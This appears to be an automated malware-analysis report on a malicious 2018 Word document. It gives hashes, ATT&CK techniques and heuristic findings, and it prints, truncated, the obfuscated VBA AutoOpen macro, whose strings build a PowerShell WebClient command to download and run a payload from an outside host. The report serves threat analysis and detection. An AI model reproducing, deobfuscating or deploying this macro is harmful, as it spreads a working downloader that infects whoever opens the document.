Office (OLE) malware analysis — malicious · 6eaafe68a1564ce0

MALICIOUS

Office (OLE)

86.5 KB Created: 2018-02-16 02:09:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 9b9bf9297378c1a541dbba1b21952922 SHA-1: 54394c5a21c5ef352a70bf18527cdc32036e8e5b SHA-256: 6eaafe68a1564ce0fd76696fe0bd4f2fbc2c2e1ba0836c4d47ec80976d78e8a5

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro uses the Shell() function and constructs a URL, likely to download and execute a second-stage payload. The reconstructed URL is "http://tras1D+s1Dns-imperial.xkf+xkfru/Hys1D+s1DDS+yDSsERTl/?http://ww" and the reconstructed string for downloading is "System.Net.WebClient;gxkf+xkfcxkf+xkfBy'+'DSxkf+xkf+ys1D+s1DS+yDSadyDS+yDxkf+xkfSasyDS+yDSd.nextxkcIqn".

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://tras1D+s1Dns-imperial.xkf+xkfru/Hys1D+s1DDS+yDSsERTl/?http://ww In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21227 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	21227 bytes
SHA-256: `24e116295c2b9e128e48f169777e4b61d23e4f4c1ce5cb545b087804b5e3b338`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "kfpCZJoYITBt" Function WXoIjfGARo() On Error Resume Next AdMni = 9825112 / CLng(ztpFb) - 6138061 * Cos(8254941) + bvoGW + 134518 ADJFtMQ = 7044642 / CLng(BSQDjqvsI) - 2439822 * Cos(2498828) + zwIYbR + 1549115 CPFXcRISH = 2575714 / CLng(iOLmAB) - 1173832 * Cos(1925595) + BMTnjAWvWJwzz + 2760301 wlPdAHLKMvP = (dCdBwzXMEJkTm) + HJjkJKD("dEzVILZifvXEaXfiMQqOS+xkf+xkfyDSsq +yDs1D+s'+'1DS+yDS gcBNSBxkf+xkf + (csq.excsxkf+xkfq+'+'yxkf+xkfDS+yDScsqeEGrLUzMmrr", 21, 89) OuiaiUnz = 2245569 / CLng(oKPIB) - 6198698 * Cos(9169266) + PMkAsDvYTtOvTw + 5122651 LdcnWW = 2953456 / CLng(RdnUIOiCSuuNiO) - 9681272 * Cos(1806563) + IzjEMNnPWpAPh + 8541860 QuOKlliRUD = 6899302 / CLng(MkCIi) - 1173221 * Cos(9721960) + zaJBL + 7711214 rOKSOLIcd = (MTEFRiopiO) + HJjkJKD("zABcAAKzFfTNYDALncsq) Systs1D+s1Dem.Net.yDS+yDSWebClienyDS+yDSt;gxkf+xkfcxkf+xkfBy'+'DSxkf+xkf+ys1D+s1DDSNSBs1D+'+'s1D yDS+yDS= gys1D+s1DDS+yDxkf+x'+'kfScBnyDS+yDSsyDs1D+s1DS+yDSadyDS+yDxkf+xkfSasyDS+yDSd'+'.nextxkcIqn", 18, 197) fXvVBzE = 398614 / CLng(jGmEl) - 747521 * Cos(6582632) + jdHEIT + 3993763 YGFAQDqLqnG = 6201381 / CLng(IYTZUKpIrwVB) - 3914799 * Cos(7228826) + mZzkSM + 2807446 wSbtu = 263475 / CLng(PwJcz) - 238151 * Cos(8702113) + zJsqibMwwvuFMH + 3004303 wNiQCP = (ZimkBKNSdvAP) + HJjkJKD("BvUIs1D+s1DS+yDSBSDs1D+s1Dxkf+xkfyD'+'S'+'+yDSCyDS+yDS =yDS+yDS gtEQKJGKGVuLBmYEdPZNJzGjVjpEsPpijX", 5, 61) zPjAiMXtDTw = 659239 / CLng(noVQUwrHiSffSZ) - 2635745 * Cos(6782905) + wTTSqvjlDAp + 634823 XQGRIjqiJHL = 952933 / CLng(dOljwsKZbXBnih) - 6118790 * Cos(4640428) + JVbuAjfzsmf + 3171383 uZNtjWbOPwP = 9223503 / CLng(EdTBQ) - 6281912 * Cos(8508140) + qZZrwQCN + 410620 XojmUnYlaZM = (KqFXEKsT) + HJjkJKD("DlCaHPYkQFwyDS gcxkf+xkfyDS+xkf+xkfyDSBSDCyDSxkf+xkf+yDxkf+xkfS);&yDS+yDS'+'(csqInvocyDSGFtiNIOjP", 12, 77) CSGCL = 2911375 / CLng(PrnsiBUInOu) - 6022859 * Cos(6899520) + kcWWzOXla + 1621253 JNYtji = 2692577 / CLng(uQMbTszWpofn) - 717317 * Cos(5394847) + UrqpYWFYDwa + 2011848 MXBopJPuu = 51497 / CLng(iQfitH) - 672298 * Cos(9394597) + vChNkww + 6872441 AnNQb = (iFjDGfIfVzK) + HJjkJKD("diZLdRFddoyDS+y'+'DScsq)yDS+yDs1D+s1DS;foreyDS+yDSachyDS+yDVptj", 11, 49) CuLad = 6291811 / CLng(ivnqIVbHO) - 1510465 * Cos(7458732) + EkjMojSKo + 6891657 TEECc = 522342 / CLng(jzYYvaIC) - 9603969 * Cos(6066179) + ojwFTQB + 2792150 jUqVvTbP = 7110495 / CLng(cJaroUdCVjusSH) - 1709089 * Cos(9300895) + LnwjX + 4857442 IVFhEiIWDcz = (sIcshzNLXAJJU) + HJjkJKD("KXJrGKS,[CHaR]36-CREPLAce ([CHaR]83+[Cxkf+xkfHaR]87+s1D+s1D[Cs1D+s1DHaR]75),[s1D+s1xkf+xkfDCHaR]92'+' -RpdEPGubmfXrZItd", 7, 98) fjEiA = 4024651 / CLng(NrwXNpamLEjFzH) - 5905548 * Cos(558092) + cwZat + 9943013 MGNhwwn = 3499005 / CLng(WDhTjvdzvSwibj) - 9514816 * Cos(8937571) + NDGshzbcwzz + 9159336 MvmhjlT = 4139118 / CLng(riZrltSb) - 1670100 * Cos(1290318) + EojYcv + 9790912 ZJnYZN = (HqwhHGfAbw) + HJjkJKD("ArfvRff+xkf(yDS+yDS10xkf+xkf000, 282133);yDS+yDIGrZrGDSkEZccPSjlMRdIoSV", 7, 41) fqOIaL = 7414337 / CLng(LvDTDAQaov) - 3593405 * Cos(3736155) + hnbpM + 5616980 tDKoqdbjAC = 279358 / CLng(pZXbGndhtC) - 2174822 * Cos(3706180) + tKnTscn + 9891235 nPJZAOTuhst = 2076558 / CLng(himiNmw) - 6499294 * Cos(4399962) + wVVjswNnsutH + 29982 TRowwpSDq = (dEZzGABoLBNmuA) + HJjkJKD("HJFCcyDSxkf+x'+'kfsqys1D+s1DDS+yDS) ras1D+s1Dndom;gyDSs1'+'D+s1D+yDScByDS+yDSYYUyDS+yDS =yDS+yDS yDS+yDS.(csqnxkf+xkfes1D+s1Dcsqys1D+sJaTDmvwTYEdP", 6, 129) ArdZzMzQvA = 7944707 / CLng(avPAGP) - 3523987 * Cos(5085401) + vplwbNWXTqH + 8113855 hBjOr = 9880600 / CLng(FXwwYSRiQn) - 6226457 * Cos(9021184) + lNYOvPKZS + 5916764 rlwqFINbMH = 9424150 / CLng(GSKshhRbT) - 1925798 * Cos(5641700) + RtHQQZ + 9609523 tiTqFTcu = (PvwUoiMX) + HJjkJKD("QFdGKsdVAcVsIC[chAR]115+[chAR]49+[chAR]68)'+',[StrING][chAR]39).rePLAcE(([chAR]118+[chAR]55+[chAR]57),[StrING][' ... (truncated)

SHA-256: 24e116295c2b9e128e48f169777e4b61d23e4f4c1ce5cb545b087804b5e3b338

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kfpCZJoYITBt"
Function WXoIjfGARo()
On Error Resume Next
AdMni = 9825112 / CLng(ztpFb) - 6138061 * Cos(8254941) + bvoGW + 134518
ADJFtMQ = 7044642 / CLng(BSQDjqvsI) - 2439822 * Cos(2498828) + zwIYbR + 1549115
CPFXcRISH = 2575714 / CLng(iOLmAB) - 1173832 * Cos(1925595) + BMTnjAWvWJwzz + 2760301
wlPdAHLKMvP = (dCdBwzXMEJkTm) + HJjkJKD("dEzVILZifvXEaXfiMQqOS+xkf+xkfyDSsq +yDs1D+s'+'1DS+yDS gcBNSBxkf+xkf + (csq.excsxkf+xkfq+'+'yxkf+xkfDS+yDScsqeEGrLUzMmrr", 21, 89)
OuiaiUnz = 2245569 / CLng(oKPIB) - 6198698 * Cos(9169266) + PMkAsDvYTtOvTw + 5122651
LdcnWW = 2953456 / CLng(RdnUIOiCSuuNiO) - 9681272 * Cos(1806563) + IzjEMNnPWpAPh + 8541860
QuOKlliRUD = 6899302 / CLng(MkCIi) - 1173221 * Cos(9721960) + zaJBL + 7711214
rOKSOLIcd = (MTEFRiopiO) + HJjkJKD("zABcAAKzFfTNYDALncsq) Systs1D+s1Dem.Net.yDS+yDSWebClienyDS+yDSt;gxkf+xkfcxkf+xkfBy'+'DSxkf+xkf+ys1D+s1DDSNSBs1D+'+'s1D yDS+yDS= gys1D+s1DDS+yDxkf+x'+'kfScBnyDS+yDSsyDs1D+s1DS+yDSadyDS+yDxkf+xkfSasyDS+yDSd'+'.nextxkcIqn", 18, 197)
fXvVBzE = 398614 / CLng(jGmEl) - 747521 * Cos(6582632) + jdHEIT + 3993763
YGFAQDqLqnG = 6201381 / CLng(IYTZUKpIrwVB) - 3914799 * Cos(7228826) + mZzkSM + 2807446
wSbtu = 263475 / CLng(PwJcz) - 238151 * Cos(8702113) + zJsqibMwwvuFMH + 3004303
wNiQCP = (ZimkBKNSdvAP) + HJjkJKD("BvUIs1D+s1DS+yDSBSDs1D+s1Dxkf+xkfyD'+'S'+'+yDSCyDS+yDS =yDS+yDS gtEQKJGKGVuLBmYEdPZNJzGjVjpEsPpijX", 5, 61)
zPjAiMXtDTw = 659239 / CLng(noVQUwrHiSffSZ) - 2635745 * Cos(6782905) + wTTSqvjlDAp + 634823
XQGRIjqiJHL = 952933 / CLng(dOljwsKZbXBnih) - 6118790 * Cos(4640428) + JVbuAjfzsmf + 3171383
uZNtjWbOPwP = 9223503 / CLng(EdTBQ) - 6281912 * Cos(8508140) + qZZrwQCN + 410620
XojmUnYlaZM = (KqFXEKsT) + HJjkJKD("DlCaHPYkQFwyDS gcxkf+xkfyDS+xkf+xkfyDSBSDCyDSxkf+xkf+yDxkf+xkfS);&yDS+yDS'+'(csqInvocyDSGFtiNIOjP", 12, 77)
CSGCL = 2911375 / CLng(PrnsiBUInOu) - 6022859 * Cos(6899520) + kcWWzOXla + 1621253
JNYtji = 2692577 / CLng(uQMbTszWpofn) - 717317 * Cos(5394847) + UrqpYWFYDwa + 2011848
MXBopJPuu = 51497 / CLng(iQfitH) - 672298 * Cos(9394597) + vChNkww + 6872441
AnNQb = (iFjDGfIfVzK) + HJjkJKD("diZLdRFddoyDS+y'+'DScsq)yDS+yDs1D+s1DS;foreyDS+yDSachyDS+yDVptj", 11, 49)
CuLad = 6291811 / CLng(ivnqIVbHO) - 1510465 * Cos(7458732) + EkjMojSKo + 6891657
TEECc = 522342 / CLng(jzYYvaIC) - 9603969 * Cos(6066179) + ojwFTQB + 2792150
jUqVvTbP = 7110495 / CLng(cJaroUdCVjusSH) - 1709089 * Cos(9300895) + LnwjX + 4857442
IVFhEiIWDcz = (sIcshzNLXAJJU) + HJjkJKD("KXJrGKS,[CHaR]36-CREPLAce ([CHaR]83+[Cxkf+xkfHaR]87+s1D+s1D[Cs1D+s1DHaR]75),[s1D+s1xkf+xkfDCHaR]92'+' -RpdEPGubmfXrZItd", 7, 98)
fjEiA = 4024651 / CLng(NrwXNpamLEjFzH) - 5905548 * Cos(558092) + cwZat + 9943013
MGNhwwn = 3499005 / CLng(WDhTjvdzvSwibj) - 9514816 * Cos(8937571) + NDGshzbcwzz + 9159336
MvmhjlT = 4139118 / CLng(riZrltSb) - 1670100 * Cos(1290318) + EojYcv + 9790912
ZJnYZN = (HqwhHGfAbw) + HJjkJKD("ArfvRff+xkf(yDS+yDS10xkf+xkf000, 282133);yDS+yDIGrZrGDSkEZccPSjlMRdIoSV", 7, 41)
fqOIaL = 7414337 / CLng(LvDTDAQaov) - 3593405 * Cos(3736155) + hnbpM + 5616980
tDKoqdbjAC = 279358 / CLng(pZXbGndhtC) - 2174822 * Cos(3706180) + tKnTscn + 9891235
nPJZAOTuhst = 2076558 / CLng(himiNmw) - 6499294 * Cos(4399962) + wVVjswNnsutH + 29982
TRowwpSDq = (dEZzGABoLBNmuA) + HJjkJKD("HJFCcyDSxkf+x'+'kfsqys1D+s1DDS+yDS) ras1D+s1Dndom;gyDSs1'+'D+s1D+yDScByDS+yDSYYUyDS+yDS =yDS+yDS yDS+yDS.(csqnxkf+xkfes1D+s1Dcsqys1D+sJaTDmvwTYEdP", 6, 129)
ArdZzMzQvA = 7944707 / CLng(avPAGP) - 3523987 * Cos(5085401) + vplwbNWXTqH + 8113855
hBjOr = 9880600 / CLng(FXwwYSRiQn) - 6226457 * Cos(9021184) + lNYOvPKZS + 5916764
rlwqFINbMH = 9424150 / CLng(GSKshhRbT) - 1925798 * Cos(5641700) + RtHQQZ + 9609523
tiTqFTcu = (PvwUoiMX) + HJjkJKD("QFdGKsdVAcVsIC[chAR]115+[chAR]49+[chAR]68)'+',[StrING][chAR]39).rePLAcE(([chAR]118+[chAR]55+[chAR]57),[StrING]['
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.